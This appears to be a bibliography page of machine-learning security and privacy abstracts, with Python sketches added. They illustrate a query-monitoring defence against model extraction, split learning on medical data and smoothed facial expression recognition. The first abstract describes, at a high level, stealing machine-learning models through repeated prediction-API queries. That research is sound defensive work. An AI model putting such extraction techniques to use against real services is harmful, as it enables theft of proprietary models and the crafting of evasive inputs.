Machine learning (ML) applications are increasingly prevalent. Protecting the confidentiality of ML models becomes paramount for two reasons: (a) a model can be a business advantage to its owner, and (b) an adversary may use a stolen model to find transferable adversarial examples that can evade classification by the original model. Access to the model can be restricted to be only via well-defined prediction APIs. Nevertheless, prediction APIs still provide enough information to allow an adversary to mount model extraction attacks by sending repeated queries via the prediction API. In this paper, we describe new model extraction attacks using novel approaches for generating synthetic queries, and optimizing training hyperparameters. Our attacks outperform state-of-the-art model extraction in terms of transferability of both targeted and non-targeted adversarial examples (up to +29-44 percentage points, pp), and prediction accuracy (up to +46 pp) on two datasets. We provide take-aways on how to perform effective model extraction attacks. We then propose PRADA, the first step towards generic and effective detection of DNN model extraction attacks. It analyzes the distribution of consecutive API queries and raises an alarm when this distribution deviates from benign behavior. We show that PRADA can detect all prior model extraction attacks with no false positives.
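As a simplified sketch of the idea stated in the abstract, the monitor below tracks per-client inter-query distances and raises an alarm when their distribution stops looking benign. The choice of minimum L2 distance, the Shapiro-Wilk normality test, and the thresholds are assumptions, not necessarily PRADA's exact procedure.

```python
# Simplified sketch: keep per-client inter-query distances and raise an alarm when
# their distribution deviates from benign behavior. The distance metric and the
# Shapiro-Wilk test used here are assumptions.
import numpy as np
from scipy.stats import shapiro

class QueryMonitor:
    def __init__(self, w_threshold=0.90, min_queries=30):
        self.queries, self.distances = [], []
        self.w_threshold, self.min_queries = w_threshold, min_queries

    def observe(self, query):
        """query: 1-D feature vector of one prediction-API request."""
        query = np.asarray(query, dtype=float)
        if self.queries:
            dists = np.linalg.norm(np.stack(self.queries) - query, axis=1)
            self.distances.append(dists.min())
        self.queries.append(query)
        if len(self.distances) < self.min_queries:
            return False                      # not enough evidence yet
        w_stat, _ = shapiro(self.distances)   # benign usage: roughly normal distances
        return w_stat < self.w_threshold      # True -> raise an extraction alarm

monitor = QueryMonitor()
rng = np.random.default_rng(0)
for _ in range(100):                          # benign-looking queries
    alarm = monitor.observe(rng.normal(0, 1, 20))
print("alarm:", alarm)
```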
2020-08-24
Jeon, Joohyung, Kim, Junhui, Kim, Joongheon, Kim, Kwangsoo, Mohaisen, Aziz, Kim, Jong-Kook.  2019.  Privacy-Preserving Deep Learning Computation for Geo-Distributed Medical Big-Data Platforms. 2019 49th Annual IEEE/IFIP International Conference on Dependable Systems and Networks – Supplemental Volume (DSN-S). :3–4.
This paper proposes a distributed deep learning framework for privacy-preserving medical data training. In order to avoid patient data leakage from medical platforms, the hidden layers of the deep learning framework are separated: the first layer is kept on the platform and the other layers are kept on a centralized server. Whereas keeping the original patient data on local platforms maintains their privacy, utilizing the server for the subsequent layers improves learning performance by using data from every platform during training.
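The sketch below illustrates the split the abstract describes: the first layer runs on the local medical platform and only its activations, not the raw patient data, cross to the server-side layers. The layer sizes, optimizer, and single-machine simulation of the two sides are assumptions for illustration.

```python
# Hypothetical sketch of the described split: the first layer stays on the local medical
# platform and only its activations (not raw patient data) reach the server-side layers.
import torch
import torch.nn as nn

class LocalFirstLayer(nn.Module):            # runs inside the hospital platform
    def __init__(self, in_dim=128, hidden=64):
        super().__init__()
        self.layer = nn.Sequential(nn.Linear(in_dim, hidden), nn.ReLU())

    def forward(self, x):
        return self.layer(x)

class ServerLayers(nn.Module):               # runs on the centralized server
    def __init__(self, hidden=64, n_classes=2):
        super().__init__()
        self.layers = nn.Sequential(nn.Linear(hidden, 64), nn.ReLU(), nn.Linear(64, n_classes))

    def forward(self, h):
        return self.layers(h)

local, server = LocalFirstLayer(), ServerLayers()
opt = torch.optim.Adam(list(local.parameters()) + list(server.parameters()), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

x, y = torch.randn(32, 128), torch.randint(0, 2, (32,))   # stand-in for one platform's batch
activations = local(x)                       # only this tensor would be transmitted
logits = server(activations)                 # gradients flow back through the cut layer
loss = loss_fn(logits, y)
opt.zero_grad(); loss.backward(); opt.step()
```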
2019-12-30
Liu, Keng-Cheng, Hsu, Chen-Chien, Wang, Wei-Yen, Chiang, Hsin-Han.  2019.  Real-Time Facial Expression Recognition Based on CNN. 2019 International Conference on System Science and Engineering (ICSSE). :120–123.
In this paper, we propose a method for improving the robustness of real-time facial expression recognition. Although there are many ways to improve the accuracy of facial expression recognition, revamping the training framework and image preprocessing allows better results in applications. One existing problem is that when the camera captures images at high speed, changes in image characteristics may occur at certain moments due to the influence of light and other factors, and such changes can result in incorrect recognition of the facial expression. To solve this problem while keeping the system running smoothly and maintaining recognition speed, we take the changes in image characteristics during high-speed capture into account. The proposed method does not use the immediate output directly, but averages it with the results from previous images to facilitate recognition. In this way, we are able to reduce interference from the characteristics of individual images. The experimental results show that, after adopting this method, the overall robustness and accuracy of facial expression recognition are greatly improved compared to those obtained by the convolutional neural network (CNN) alone.
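The smoothing idea can be sketched in a few lines: keep a running window of the CNN's per-frame class probabilities and report the argmax of the average rather than of the instantaneous output. The window length and class labels below are assumptions, not the paper's settings.

```python
# Hypothetical sketch of the smoothing idea: average the CNN's class probabilities over
# the last few frames and report the argmax of the average, not of the single frame.
from collections import deque
import numpy as np

class SmoothedExpressionRecognizer:
    def __init__(self, classes, window=5):
        self.classes = classes
        self.history = deque(maxlen=window)   # recent per-frame probability vectors

    def update(self, frame_probs):
        """frame_probs: softmax output of the CNN for the current frame."""
        self.history.append(np.asarray(frame_probs, dtype=float))
        avg = np.mean(self.history, axis=0)   # damps flicker caused by lighting changes
        return self.classes[int(avg.argmax())]

recognizer = SmoothedExpressionRecognizer(["neutral", "happy", "sad", "angry"])
for probs in [[0.1, 0.8, 0.05, 0.05],        # stable "happy" frames ...
              [0.1, 0.7, 0.1, 0.1],
              [0.6, 0.2, 0.1, 0.1]]:         # ... then one glare-corrupted frame
    label = recognizer.update(probs)
print(label)                                  # still "happy" thanks to the averaging
```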
2020-03-09
Cao, Yuan, Zhao, Yongli, Li, Jun, Lin, Rui, Zhang, Jie, Chen, Jiajia.  2019.  Reinforcement Learning Based Multi-Tenant Secret-Key Assignment for Quantum Key Distribution Networks. 2019 Optical Fiber Communications Conference and Exhibition (OFC). :1–3.
We propose a reinforcement learning based online multi-tenant secret-key assignment algorithm for quantum key distribution networks, capable of reducing tenant-request blocking probability more than half compared to the benchmark heuristics.
2020-09-28
Oya, Simon, Troncoso, Carmela, Pérez-González, Fernando.  2019.  Rethinking Location Privacy for Unknown Mobility Behaviors. 2019 IEEE European Symposium on Security and Privacy (EuroS P). :416–431.
Location Privacy-Preserving Mechanisms (LPPMs) in the literature largely assume that the users' data available for training wholly characterizes their mobility patterns. Thus, they hardwire this information in their designs and evaluate their privacy properties with these same data. In this paper, we aim to understand the impact of this decision on the level of privacy these LPPMs may offer in real life, when the users' mobility data may differ from the data used in the design phase. Our results show that, in many cases, training data does not capture users' behavior accurately and, thus, the level of privacy provided by the LPPM is often overestimated. To address this gap between theory and practice, we propose to use blank-slate models for LPPM design. Contrary to the hardwired approach, which assumes known user behavior, blank-slate models learn the users' behavior from the queries to the service provider. We leverage this blank-slate approach to develop a new family of LPPMs, which we call Profile Estimation-Based LPPMs. Using real data, we empirically show that our proposal outperforms optimal state-of-the-art mechanisms designed on sporadic hardwired models. In non-sporadic location privacy scenarios, our method is only better if the usage of the location privacy service is not continuous. It is our hope that eliminating the need to bootstrap the mechanisms with training data, and ensuring that the mechanisms are lightweight and easy to compute, will help foster the integration of location privacy protections in deployed systems.